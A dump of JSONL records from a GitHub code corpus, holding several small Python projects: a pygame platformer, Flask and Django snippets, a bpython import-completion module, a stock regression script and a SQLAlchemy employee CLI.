raise\r\n\"\"\"\r\n","repo_name":"PatrycjaHomosapiens/Python","sub_path":"Obiekty_Zad_7_bankomat_z_wyjatkami_moje.py","file_name":"Obiekty_Zad_7_bankomat_z_wyjatkami_moje.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22643617077","text":"import pygame\nimport sys\nfrom pygame.locals import * # used for keys and events\nfrom levels import world\nfrom art import draw_tile\n\n# Game set up\npygame.init()\nFPS = 60\nfpsClock = pygame.time.Clock()\nwindow_width = 1200\nwindow_height = 600\nwindow = pygame.display.set_mode((window_width, window_height))\npygame.display.set_caption('Object Platformer')\nicon = pygame.Surface((20, 20))\npygame.display.set_icon(icon)\n\n# initializing font for later use\npygame.font.init()\nfont = pygame.font.SysFont('arial', 40)\n\n# used for get FPS\ntick = pygame.time.Clock()\n\n# list of entities to track them all\nentities = []\n\n# takes input of (value, [minimum, maximum]) to clamp.\ndef clamp(value, val_range):\n    if value < val_range[0]: return val_range[0]\n    if value > val_range[1]: return val_range[1]\n    return value\n\nclass Entity(object):\n    def __init__(self, x, y, width, height, color, type):\n        self.rect = pygame.Rect(x, y, width, height)\n        entities.append(self)\n        self.color = color\n        self.type = type\n    def delete_self(self):\n        entities.remove(self)\n        del self \n    def draw(self, x_displacement, y_displacement):\n        new_rect = pygame.Rect(self.rect.x - x_displacement, self.rect.y - y_displacement, \n                                self.rect.width, self.rect.height)\n        if new_rect.colliderect(pygame.Rect(0, 0, 1200, 600)): # if on screen, draws\n            if self.type == \"Platform\":\n                draw_tile(window, new_rect.x, new_rect.y, self.color)\n            else:\n                pygame.draw.rect(window, self.color, new_rect)\n\nclass Platform(Entity):\n    def __init__(self, x, y, color):\n        super().__init__(x, y, 30, 30, color, \"Platform\")\n\nclass Player(Entity):\n    def __init__(self, x, y):\n        super().__init__(x, y, 20, 20, (0, 0, 255), \"Player\")\n        self.y_vel = 0\n        self.x_vel = 0\n\n        self.x_dir = 0\n        self.dash_counter = 0\n\n        self.on_ground = False\n        self.previously_jumping = False\n        self.double_jump = False\n        self.double_jump_counter = 0\n        \n        self.pos_upon_reset = (x, y)\n        self.ask_to_advance_level = False\n\n        # used for tracer\n        self.previous_positions = [(x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), \n            (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), \n            (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), \n            (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y)]\n\n    def move(self):\n        key = pygame.key.get_pressed()\n        if key[K_LEFT] or key[K_a]:\n            self.x_vel -= 1\n            self.x_dir = -15\n        if key[K_RIGHT] or key[K_d]:\n            self.x_vel += 1\n            self.x_dir = 15\n        if key[K_r]:\n            self.reset_pos()\n\n        if self.x_vel > 0: # friction\n            self.x_vel -= 0.5\n        elif self.x_vel < 0:\n            self.x_vel += 0.5\n        if self.x_vel > 8: # extra friction\n            self.x_vel -= 0.5\n        elif self.x_vel < -8:\n            self.x_vel += 0.5\n        if self.x_vel > 12: # extra extra friction\n            self.x_vel 
-= 0.5\n elif self.x_vel < -12:\n self.x_vel += 0.5\n self.y_vel = clamp(self.y_vel, (-14, 14)) # y-terminal velocity\n\n if key[K_SPACE] and self.dash_counter <= 0:\n self.x_vel += self.x_dir\n self.dash_counter = 60\n\n if self.dash_counter > 0:\n self.dash_counter -= 1\n\n # jumping\n if (key[K_UP] or key[K_w]) and not self.previously_jumping:\n if self.on_ground:\n self.y_vel = -10\n elif self.double_jump and self.double_jump_counter > 5:\n self.y_vel = -10\n self.double_jump = False\n \n if key[K_UP] or key[K_w]: # setting this frame's values for next frame\n self.previously_jumping = True\n else:\n self.previously_jumping = False\n\n if not self.on_ground: # gravity\n self.y_vel += 0.3\n self.double_jump_counter += 1\n if key[K_DOWN] or key[K_s]:\n self.y_vel += 0.7\n \n self.on_ground = False # assumes you aren't on the ground until later proven wrong\n \n self.collide(0, self.y_vel) # separate collisions for x and y\n self.collide(self.x_vel, 0)\n\n self.previous_positions.append((self.rect.x, self.rect.y)) # adding previous position\n average_x = (self.rect.x + self.previous_positions[-1][0])/2 # getting an in-between frame\n average_y = (self.rect.y + self.previous_positions[-1][1])/2\n self.previous_positions.append((average_x, average_y)) # adding it\n del self.previous_positions[0] # removing old frames\n del self.previous_positions[0]\n\n def collide(self, x, y):\n self.rect.y += y\n self.rect.x += x\n\n ground_touched_list = []\n for ent in entities:\n if ent.type == \"Platform\":\n if self.rect.colliderect(ent.rect):\n \n if ent.color == \"Grass\" or ent.color == \"Dirt\": # does collisions with these walls\n if x > 0:\n self.rect.right = ent.rect.left\n self.x_vel = 0\n elif x < 0:\n self.rect.left = ent.rect.right\n self.x_vel = 0\n if y > 0:\n self.rect.bottom = ent.rect.top\n self.y_vel = 0\n elif y < 0:\n self.rect.top = ent.rect.bottom\n ground_touched_list.append(\"Dirt\")\n \n else: # appends other things to the list to deal with later\n ground_touched_list.append(ent.color)\n if ent.color == \"Bomb\":\n ground_touched_list.append(ent.rect.center)\n \n # if you are touching the top of grass/dirt, then you are considered on the ground.\n if (ent.color == \"Grass\" or ent.color == \"Dirt\") and self.rect.bottom == ent.rect.top and \\\n self.rect.left in range (ent.rect.left - self.rect.width, ent.rect.right):\n self.on_ground = True\n self.double_jump_counter = 0\n self.double_jump = True\n\n # if you touched the ground, it overrides everything else\n if ground_touched_list.count(\"Dirt\") == 0:\n\n if ground_touched_list.count(\"Trampoline\") > 0:\n if -2 < self.y_vel > 2: self.y_vel *= -1\n self.y_vel -= 1.5\n\n elif ground_touched_list.count(\"Side Trampoline\") > 0:\n if x > 0: # if you were moving right,\n self.x_vel = -30\n if x < 0: # if you were moving left,\n self.x_vel = 30\n self.y_vel -= 4 \n \n elif ground_touched_list.count(\"Bomb\") > 0:\n for value in ground_touched_list:\n if type(value) == tuple: # bombs add another value, a tuple, including \n x_diff = self.rect.centerx - value[0] # their coords. 
a bit jank, but the cleanest\n y_diff = self.rect.centery - value[1] # implementation with the current system\n total_diff = (abs(x_diff) + abs(y_diff)) # i could find\n\n x_vector = x_diff / total_diff\n y_vector = y_diff / total_diff\n\n self.x_vel = int(x_vector * 50)\n self.y_vel = int(y_vector * 100)\n break\n\n elif ground_touched_list.count(\"Exit\") > 0:\n self.ask_to_advance_level = True\n\n else: # if you only touched lava, lava triggers\n if ground_touched_list.count(\"Lava\") > 0:\n self.reset_pos()\n \n \n def reset_pos(self):\n self.rect.x = self.pos_upon_reset[0]\n self.rect.y = self.pos_upon_reset[1]\n self.x_vel = 0\n self.y_vel = 0\n\n\ndef generate_level(level, player):\n # making a list of all platforms, then deleting them\n to_del = [ent for ent in entities if ent.type == \"Platform\"]\n for thing_to_del in to_del:\n thing_to_del.delete_self()\n \n # adding new platforms\n x = 0\n y = 0\n for row in level:\n for value in row:\n if value == \"G\":\n Platform(x, y, \"Grass\")\n if value == \"D\":\n Platform(x, y, \"Dirt\")\n if value == \"T\":\n Platform(x, y, \"Trampoline\")\n if value == \"t\":\n Platform(x, y, \"Side Trampoline\")\n if value == \"B\":\n Platform(x, y, \"Bomb\")\n if value == \"L\":\n Platform(x, y, \"Lava\")\n if value == \"E\":\n Platform(x, y, \"Exit\")\n if value == \"R\":\n player.pos_upon_reset = (x+5, y+10)\n x += 30\n x = 0\n y += 30\n\ndef max_camera_values(level):\n # starts values at 0 and adds 30 (platform height and width) for each additional platform there is \n # going right/down after the regular size of one screen (40 width, 20 height)\n max_length = 0\n for row in level:\n max_length = max(len(row), max_length)\n max_length = (max_length - 40) * 30\n max_height = (len(level) - 20) * 30\n return max_length, max_height\n\ndef main():\n # define\n player = Player(40, 550)\n \n level = 0\n generate_level(world[level], player)\n max_length, max_height = max_camera_values(world[level])\n player.reset_pos()\n\n previous_backspace = False\n show_FPS = False\n FPS_list = [60, 60, 60, 60]\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n window.fill((0, 0, 0))\n\n # moving player\n player.move()\n\n # camera things\n x_distance = player.rect.x - 570 # finding how much displacement is needed to center player\n y_distance = player.rect.y - 300\n x_displacement = clamp(x_distance, (0, max_length)) # clamping the displacement so it doesn't show off-stage\n y_displacement = clamp(y_distance, (0, max_height))\n\n # drawing the entities\n for ent in entities:\n ent.draw(x_displacement, y_displacement)\n player.draw(x_displacement, y_displacement) # drawing player again to make sure it's on top\n \n # drawing the tracer\n s = pygame.Surface((20, 20))\n for tracer in player.previous_positions:\n s.fill((0, 0, 255))\n s.set_alpha(player.previous_positions.index(tracer)/3) # alpha based on index\n window.blit(s, (tracer[0] - x_displacement, tracer[1] - y_displacement))\n\n # going to next level\n if player.ask_to_advance_level:\n level += 1\n generate_level(world[level], player)\n max_length, max_height = max_camera_values(world[level])\n player.ask_to_advance_level = False\n player.reset_pos()\n \n if pygame.key.get_pressed()[K_BACKSPACE]:\n if previous_backspace == False:\n if show_FPS: \n show_FPS = False\n else:\n show_FPS = True\n previous_backspace = True\n else:\n previous_backspace = False\n\n tick.tick() # doing this calculation even when not using it so that\n 
FPS_list.append(int(tick.get_fps())) # the FPS displayed when it is shown is more accurate\n        del FPS_list[0]\n        average_FPS = sum(FPS_list) / len(FPS_list)\n\n        if show_FPS:\n            if average_FPS < 15:\n                color = (255, 0, 0)\n            elif average_FPS < 30:\n                color = (255, 255, 0)\n            else:\n                color = (255, 255, 255)\n            window.blit(font.render(f\"FPS: {average_FPS}\", True, color), pygame.Rect(1000, 2, 0, 0))\n\n        # making game run\n        fpsClock.tick(FPS)\n        pygame.display.update()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"PikaToo/ObjectPlatformer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9169269822","text":"import threading\nfrom django.core import mail\n\nclass EmailThread(threading.Thread):\n    def __init__(self, subject, plain_message, from_email, to_email, html_message):\n        self.subject = subject\n        self.plain_message = plain_message\n        self.from_email = from_email\n        self.to_email = to_email\n        self.html_message = html_message\n        super(EmailThread, self).__init__()\n\n    def run(self):\n        mail_send = mail.send_mail(self.subject, self.plain_message, self.from_email, [self.to_email], html_message=self.html_message)\n        print('mail send successfully ', mail_send)","repo_name":"irshad-basha-shaik/assets","sub_path":"asst/assetapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25850979287","text":"import re\nimport os\nimport math\n\ndef eachdir(path):\n    pathdir = os.listdir(path)\n    dic = list()\n    for p in pathdir:\n        f = os.path.join('%s/%s' %(path, p))\n        dic.append(f)\n    return dic\n\ndef getfiles(filepath):\n    path = os.listdir(filepath)\n    filenames = list()\n    for p in path:\n        filename = os.path.join('%s/%s' %(filepath, p))\n        filenames.append(filename)\n    return filenames\n\ndef getdata(filename):\n#    print filename\n    data = open(filename, 'r').read().decode('euc-kr')\n    titles = re.findall('<title>(.*?)</title>', data, re.S)\n    subtitles = re.findall('<subtitle>(.*?)</subtitle>', data, re.S)\n    bodys = re.findall('<body>(.*?)</body>', data, re.S)\n    title = \"\"\n    subtitle = \"\"\n    body = \"\"\n    for t in titles:\n        #t = unicode(t, 'utf-8')\n        t = t.replace('\\n', ' ')\n        t = re.sub(u'[^\\uAC00-\\uD7A3 ]', '', t)\n        t = re.sub('[ ]+', ' ', t)\n        title = title + t\n    for t in subtitles:\n        #t = unicode(t, 'utf-8')\n        t = t.replace('\\n', ' ')\n        t = re.sub(u'[^\\uAC00-\\uD7A3 ]', '', t)\n        t = re.sub('[ ]+', ' ', t)\n        subtitle = subtitle + t\n    for t in bodys:\n        #t = unicode(t, 'utf-8')\n        t = t.replace('\\n', ' ')\n        t = re.sub(u'[^\\uAC00-\\uD7A3 ]', '', t)\n        t = re.sub('[ ]+', ' ', t)\n        body = body + t\n    return title.strip(' '), subtitle.strip(' '), body.strip(' ')\n
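\n# Note on the filters above: the pattern [^\uAC00-\uD7A3 ] keeps only Hangul\n# syllables (the U+AC00..U+D7A3 block) plus spaces, so every non-Korean\n# character is dropped before the whitespace runs are collapsed.\n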
\n\ndef predata(i, lable, filename):\n    title, subtitle, body = getdata(filename)\n    train = open('train','a')\n    test = open('test', 'a')\n    text = title.strip(' ')\n    text = text.split(' ')\n    title = \"\"\n    for t in text:\n        for j in range(len(t)):\n            title = title + t[j:j+1] + \" \"\n    title = title.strip(' ')\n    if i <= 5001:\n        train.write(str(lable) + \"xkx\" + title.encode('utf-8') + '\\n')\n    else:\n        test.write(str(lable) + \"xkx\" + title.encode('utf-8') + '\\n')\n    train.close()\n    test.close()\n\ndef main(data):\n    child = eachdir(data)\n    lables = {'15':0, '16':1, '21':2, '22':3, '23':4, '24':5, '25':6, '3B':7, '4':8, '52':9, 'G1':10, 'G2':11}\n    for c in child:\n        j = 0\n        lable = lables[c[8:]]\n        filenames = getfiles(c)\n        for filename in filenames:\n            predata(j, lable, filename)\n            j = j + 1\n\nmain('../data')\n","repo_name":"voltelxu/some","sub_path":"lstm/getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70078066090","text":"from enum import Enum\n\nfrom sqlalchemy import Column, String, MetaData, Table, Integer, ForeignKey, BigInteger\n\nfrom models.posts import posts\n\n\nclass Status(Enum):\n    coursing = \"coursing\"\n    on_feeling_tracker = \"on_feeling_tracker\"\n    off_feeling_tracker = \"off_feeling_tracker\"\n    inactive = \"inactive\"\n\n\nmetadata_users = MetaData()\n\nusers = Table(\n    \"users\",\n    metadata_users,\n    Column(\"id\", Integer, primary_key=True),\n    Column(\"user_id\", BigInteger),\n    Column(\"next_post_id\", Integer, ForeignKey(posts.c.id)),\n    Column(\"status\", String),\n)\n","repo_name":"TsaTsaTsa/KLTelegramBot","sub_path":"CourseProject/CourseProject/models/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4529818818","text":"# 11.2.4  The setUp() method\n# In the earlier test_survey.py,\n# we created an AnonymousSurvey instance in every test method, and built the answers in every method as well.\n# The unittest.TestCase class includes a setUp() method\n# that lets us create these objects just once and then use them in every test method.\n# If you include a setUp() method in a TestCase class,\n# Python runs it first, before running each method whose name starts with test_.\n# That way, the objects created in setUp() are available in every test method you write.\n# Below, setUp() is used to create a survey object and a set of answers for test_store_single_response() and test_store_three_responses() to use:\nimport unittest\nfrom survey import AnonymousSurvey\n\nclass TestAnonymousSurvey(unittest.TestCase):\n    \"\"\"Tests for the AnonymousSurvey class\"\"\"\n    def setUp(self):\n        \"\"\"\n        Create a survey object and a set of answers for the test methods to use\n        \"\"\"\n        question = 'What language did you first learn to speak?'\n        self.my_survey = AnonymousSurvey(question)\n        self.responses = ['English','Spanish','Mandarin']\n\n    def test_store_single_response(self):\n        \"\"\"Test that a single answer is stored properly\"\"\"\n        self.my_survey.store_response(self.responses[0])\n        self.assertIn(self.responses[0], self.my_survey.responses)\n\n    def test_store_three_responses(self):\n        \"\"\"Test that three answers are stored properly\"\"\"\n        for response in self.responses:\n            self.my_survey.store_response(response)\n        for response in self.responses:\n            self.assertIn(response, self.my_survey.responses)\nunittest.main()","repo_name":"pangfeiyo/PythonLearn","sub_path":"Python:从入门到实践/从入门到实践代码/第11章 测试代码/11.2 测试类/方法setUp().py","file_name":"方法setUp().py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18433237037","text":"from flask import Flask, render_template\nimport modules.dinstation\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello():\n    return 'pendler-statistik'\n\n\n@app.route('/trains')\ndef trains():\n    trains = modules.dinstation.get_trains(\"HH\")\n    return render_template('trains.html', trains=trains)\n\n\nif __name__ == '__main__':\n    # This is used when running locally only. When deploying to Google App\n    # Engine, a webserver process such as Gunicorn will serve the app. 
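(A typical flexible-environment entrypoint is `gunicorn -b :$PORT main:app`.) 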
You\n    # can configure startup instructions by adding `entrypoint` to app.yaml.\n    app.run(host='127.0.0.1', port=8080, debug=True)\n","repo_name":"rasmusselsmark/pendler-statistik-appengine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14834143473","text":"import time\n\nfrom thread_example import call_slow_fibonacci, has_call_finished, get_call_value\n\n# Call this file if you want to check how it's supposed to work in pure python\nif __name__ == '__main__':\n    index = 35  # This should be slow enough to last a few seconds\n    thread_id = call_slow_fibonacci(index)\n\n    while not has_call_finished(thread_id):\n        print('Waiting for the task to finish...')\n        time.sleep(0.3)\n\n    value = get_call_value(thread_id)\n    print(f'Fibonacci number {index} equals to {value}')\n","repo_name":"overfl0/Pythia","sub_path":"examples/@PythiaThread/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"38598574558","text":"str_ = input()\ndata = [str_[i:i+2] for i in range(0,len(str_),2)]\n\nscore = {\"A\" : 0, \"B\" : 0}\n\nfor point in data:\n    score[point[0]] += int(point[1])\n\nif score[\"A\"] > score[\"B\"]:\n    print(\"A\")\nelse:\n    print(\"B\")","repo_name":"Bhdzhdz/competitive-programming","sub_path":"kattis/problems/basketballoneonone.py","file_name":"basketballoneonone.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11724514267","text":"import pandas as pd\r\nimport quandl, math\r\nimport numpy as np\r\nfrom sklearn import preprocessing, svm, model_selection\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n\r\n\r\ndf = quandl.get(\"CHRIS/MGEX_IH1\", authtoken=\"Ns1FcMzkyM-kGRMbixt2\")\r\n\r\n#print(df.head)\r\n\r\ndf = df[['Open', 'High', 'Low', 'Last', 'Volume']]\r\ndf['Volatility_PCT'] = (df['High']-df['Low'])/df['Low']*100.0\r\ndf['Inc_Dec_PCT'] = (df['Last']-df['Open'])/df['Open']*100.0\r\n\r\ndf = df[['Last', 'Volatility_PCT', 'Inc_Dec_PCT', 'Volume']]\r\n\r\nforecast_col = 'Last'\r\ndf.fillna(-99999, inplace=True)\r\n\r\nforecast_out = int(math.ceil(0.01*len(df))) # forecast horizon: 1% of the total number of days\r\n'''\r\nHere we use the pandas shift method to shift the label column up by forecast_out rows, so that \r\neach row's label holds the 'Last' value forecast_out days into the future.\r\n'''\r\n\r\ndf['Labels'] = df[forecast_col].shift(-forecast_out)\r\ndf.dropna(inplace=True)\r\n\r\nX = np.array(df.drop(['Labels'], 1))\r\ny = np.array(df['Labels'])\r\nX = preprocessing.scale(X) #normalising x\r\ny = preprocessing.scale(y) #normalising y\r\n\r\nX_train, X_test, y_train, y_test = model_selection.train_test_split(X,y,test_size=0.2)\r\nclf1 = LinearRegression()\r\nclf1.fit(X_train, y_train)\r\naccuracy1 = clf1.score(X_test, y_test)\r\n\r\nclf2 = svm.SVR(kernel=\"linear\")\r\nclf2.fit(X_train, y_train)\r\naccuracy2 = clf2.score(X_test, y_test)\r\n\r\n\r\nprint(accuracy1, accuracy2)","repo_name":"AtrayeeNeog/Machine-Learning-1","sub_path":"Regression.py","file_name":"Regression.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144298103","text":"\"\"\"\nGiven an array of intervals where intervals[i] = [starti, endi], return 
the\nminimum number of intervals you need to remove to make the rest of the\nintervals non-overlapping.\n\nExample 1:\n Input: intervals = [[1,2],[2,3],[3,4],[1,3]]\n Output: 1\n Explanation: [1,3] can be removed and the rest of the intervals are non-overlapping.\n\nExample 2:\n Input: intervals = [[1,2],[1,2],[1,2]]\n Output: 2\n Explanation: You need to remove two [1,2] to make the rest of the intervals non-overlapping.\n\nExample 3:\n Input: intervals = [[1,2],[2,3]]\n Output: 0\n Explanation: You don't need to remove any of the intervals since they're already non-overlapping.\n\"\"\"\nfrom typing import List\n\n\ndef solution(intervals: List[List[int]]):\n intervals.sort()\n\n res = 0\n prev_end = intervals[0][1]\n for start, end in intervals[1:]:\n if prev_end <= start:\n prev_end = end\n else:\n res += 1\n prev_end = min(end, prev_end)\n return res\n\n\nprint(solution([[1, 2], [2, 3], [3, 4], [1, 3]]))\nprint(solution([[1, 2], [1, 2], [1, 2]]))\nprint(solution([[1, 2], [2, 3]]))\n","repo_name":"pushpa66/Learn-data-structures-and-algorithms-in-python","sub_path":"75/Q36 Non Overlapping Intervals_Leetcode 435.py","file_name":"Q36 Non Overlapping Intervals_Leetcode 435.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71388570729","text":"import fnmatch\nimport importlib.machinery\nimport sys\nimport warnings\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Optional, Set, Generator, Sequence, Iterable, Union\n\nfrom .line import (\n current_word,\n current_import,\n current_from_import_from,\n current_from_import_import,\n)\n\nSUFFIXES = importlib.machinery.all_suffixes()\nLOADERS = (\n (\n importlib.machinery.ExtensionFileLoader,\n importlib.machinery.EXTENSION_SUFFIXES,\n ),\n (\n importlib.machinery.SourceFileLoader,\n importlib.machinery.SOURCE_SUFFIXES,\n ),\n)\n\n_LOADED_INODE_DATACLASS_ARGS = {\"frozen\": True}\nif sys.version_info[:2] >= (3, 10):\n _LOADED_INODE_DATACLASS_ARGS[\"slots\"] = True\n\n\n@dataclass(**_LOADED_INODE_DATACLASS_ARGS)\nclass _LoadedInode:\n dev: int\n inode: int\n\n\nclass ModuleGatherer:\n def __init__(\n self,\n paths: Optional[Iterable[Union[str, Path]]] = None,\n skiplist: Optional[Sequence[str]] = None,\n ) -> None:\n \"\"\"Initialize module gatherer with all modules in `paths`, which should be a list of\n directory names. 
If `paths` is not given, `sys.path` will be used.\"\"\"\n\n # Cached list of all known modules\n self.modules: Set[str] = set()\n # Set of (st_dev, st_ino) to compare against so that paths are not repeated\n self.paths: Set[_LoadedInode] = set()\n # Patterns to skip\n self.skiplist: Sequence[str] = (\n skiplist if skiplist is not None else tuple()\n )\n self.fully_loaded = False\n\n if paths is None:\n self.modules.update(sys.builtin_module_names)\n paths = sys.path\n\n self.find_iterator = self.find_all_modules(\n Path(p).resolve() if p else Path.cwd() for p in paths\n )\n\n def module_matches(self, cw: str, prefix: str = \"\") -> Set[str]:\n \"\"\"Modules names to replace cw with\"\"\"\n\n full = f\"{prefix}.{cw}\" if prefix else cw\n matches = (\n name\n for name in self.modules\n if (name.startswith(full) and name.find(\".\", len(full)) == -1)\n )\n if prefix:\n return {match[len(prefix) + 1 :] for match in matches}\n else:\n return set(matches)\n\n def attr_matches(\n self, cw: str, prefix: str = \"\", only_modules: bool = False\n ) -> Set[str]:\n \"\"\"Attributes to replace name with\"\"\"\n full = f\"{prefix}.{cw}\" if prefix else cw\n module_name, _, name_after_dot = full.rpartition(\".\")\n if module_name not in sys.modules:\n return set()\n module = sys.modules[module_name]\n if only_modules:\n matches = {\n name\n for name in dir(module)\n if name.startswith(name_after_dot)\n and f\"{module_name}.{name}\" in sys.modules\n }\n else:\n matches = {\n name for name in dir(module) if name.startswith(name_after_dot)\n }\n module_part = cw.rpartition(\".\")[0]\n if module_part:\n matches = {f\"{module_part}.{m}\" for m in matches}\n\n return matches\n\n def module_attr_matches(self, name: str) -> Set[str]:\n \"\"\"Only attributes which are modules to replace name with\"\"\"\n return self.attr_matches(name, only_modules=True)\n\n def complete(self, cursor_offset: int, line: str) -> Optional[Set[str]]:\n \"\"\"Construct a full list of possibly completions for imports.\"\"\"\n tokens = line.split()\n if \"from\" not in tokens and \"import\" not in tokens:\n return None\n\n result = current_word(cursor_offset, line)\n if result is None:\n return None\n\n from_import_from = current_from_import_from(cursor_offset, line)\n if from_import_from is not None:\n import_import = current_from_import_import(cursor_offset, line)\n if import_import is not None:\n # `from a import ` completion\n matches = self.module_matches(\n import_import.word, from_import_from.word\n )\n matches.update(\n self.attr_matches(import_import.word, from_import_from.word)\n )\n else:\n # `from ` completion\n matches = self.module_attr_matches(from_import_from.word)\n matches.update(self.module_matches(from_import_from.word))\n return matches\n\n cur_import = current_import(cursor_offset, line)\n if cur_import is not None:\n # `import ` completion\n matches = self.module_matches(cur_import.word)\n matches.update(self.module_attr_matches(cur_import.word))\n return matches\n else:\n return None\n\n def find_modules(self, path: Path) -> Generator[Optional[str], None, None]:\n \"\"\"Find all modules (and packages) for a given directory.\"\"\"\n if not path.is_dir():\n # Perhaps a zip file\n return\n if any(fnmatch.fnmatch(path.name, entry) for entry in self.skiplist):\n # Path is on skiplist\n return\n\n finder = importlib.machinery.FileFinder(str(path), *LOADERS) # type: ignore\n try:\n for p in path.iterdir():\n if p.name.startswith(\".\") or p.name == \"__pycache__\":\n # Impossible to import from names starting with . 
and we can skip __pycache__\n                    continue\n                elif any(\n                    fnmatch.fnmatch(p.name, entry) for entry in self.skiplist\n                ):\n                    # Path is on skiplist\n                    continue\n                elif not any(p.name.endswith(suffix) for suffix in SUFFIXES):\n                    # Possibly a package\n                    if \".\" in p.name:\n                        continue\n                elif p.is_dir():\n                    # Unfortunately, CPython just crashes if there is a directory\n                    # which ends with a python extension, so work around.\n                    continue\n                name = p.name\n                for suffix in SUFFIXES:\n                    if name.endswith(suffix):\n                        name = name[: -len(suffix)]\n                        break\n                if name == \"badsyntax_pep3120\":\n                    # Workaround for issue #166\n                    continue\n\n                package_pathname = None\n                try:\n                    with warnings.catch_warnings():\n                        warnings.simplefilter(\"ignore\", ImportWarning)\n                        spec = finder.find_spec(name)\n                        if spec is None:\n                            continue\n                        if spec.submodule_search_locations is not None:\n                            package_pathname = spec.submodule_search_locations[\n                                0\n                            ]\n                except (ImportError, OSError, SyntaxError, UnicodeEncodeError):\n                    # UnicodeEncodeError happens with Python 3 when there is a filename in some invalid encoding\n                    continue\n\n                if package_pathname is not None:\n                    path_real = Path(package_pathname).resolve()\n                    try:\n                        stat = path_real.stat()\n                    except OSError:\n                        continue\n                    loaded_inode = _LoadedInode(stat.st_dev, stat.st_ino)\n                    if loaded_inode not in self.paths:\n                        self.paths.add(loaded_inode)\n                        for subname in self.find_modules(path_real):\n                            if subname is None:\n                                yield None  # take a break to avoid unresponsiveness\n                            elif subname != \"__init__\":\n                                yield f\"{name}.{subname}\"\n                yield name\n        except OSError:\n            # Path is not readable\n            return\n        yield None  # take a break to avoid unresponsiveness\n\n    def find_all_modules(\n        self, paths: Iterable[Path]\n    ) -> Generator[None, None, None]:\n        \"\"\"Return a list with all modules in `path`, which should be a list of\n        directory names. If path is not given, sys.path will be used.\"\"\"\n\n        for p in paths:\n            for module in self.find_modules(p):\n                if module is not None:\n                    self.modules.add(module)\n                yield\n\n    def find_coroutine(self) -> bool:\n        if self.fully_loaded:\n            return False\n\n        try:\n            next(self.find_iterator)\n        except StopIteration:\n            self.fully_loaded = True\n\n        return True\n","repo_name":"bpython/bpython","sub_path":"bpython/importcompletion.py","file_name":"importcompletion.py","file_ext":"py","file_size_in_byte":8777,"program_lang":"python","lang":"en","doc_type":"code","stars":2476,"dataset":"github-code","pt":"53"} +{"seq_id":"4548395954","text":"from darbuotojas import engine, Darbuotojas, Base\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom datetime import datetime\r\n\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n
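\r\n# Hedged sketch (the real model lives in darbuotojas.py and is not shown here):\r\n# Darbuotojas is assumed to be a declarative-Base class whose columns match the\r\n# constructor used below, e.g. name, last_name, birthdate, position, salary.\r\n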
\r\nwhile True:\r\n    pasirinkimas = int(input(\"Choose: 1 - enter an employee, 2 - delete, 3 - update, 8 - view, 9 - exit\"))\r\n    if pasirinkimas == 1:\r\n        while True:\r\n            try:\r\n                name = input(\"Enter the first name\")\r\n                last_name = input(\"Enter the last name\")\r\n                birthdate = datetime.strptime(input(\"Enter the birth date (YYYY-MM-DD)\"), \"%Y-%m-%d\")\r\n                position = input(\"Enter the position\")\r\n                salary = float(input(\"Enter the salary\"))\r\n                darbuotojas = Darbuotojas(name, last_name, birthdate, position, salary)\r\n                session.add(darbuotojas)\r\n                session.commit()\r\n                break\r\n            except:\r\n                print(\"Error. Please try again\")\r\n    if pasirinkimas == 2:\r\n        visi = session.query(Darbuotojas).all()\r\n        for darbuotojas in visi:\r\n            print(darbuotojas)\r\n        numeris = int(input(\"Choose the ID of the record to delete\"))\r\n        trinamas_darbuotojas = session.query(Darbuotojas).get(numeris)\r\n        session.delete(trinamas_darbuotojas)\r\n        session.commit()\r\n    if pasirinkimas == 3:\r\n        visi = session.query(Darbuotojas).all()\r\n        for darbuotojas in visi:\r\n            print(darbuotojas)\r\n        numeris = int(input(\"Choose the ID of the record to edit\"))\r\n        darbuotojas = session.query(Darbuotojas).get(numeris)\r\n        while True:\r\n            try:\r\n                darbuotojas.name = input(\"Enter the first name\")\r\n                darbuotojas.last_name = input(\"Enter the last name\")\r\n                darbuotojas.birthdate = datetime.strptime(input(\"Enter the birth date (YYYY-MM-DD)\"), 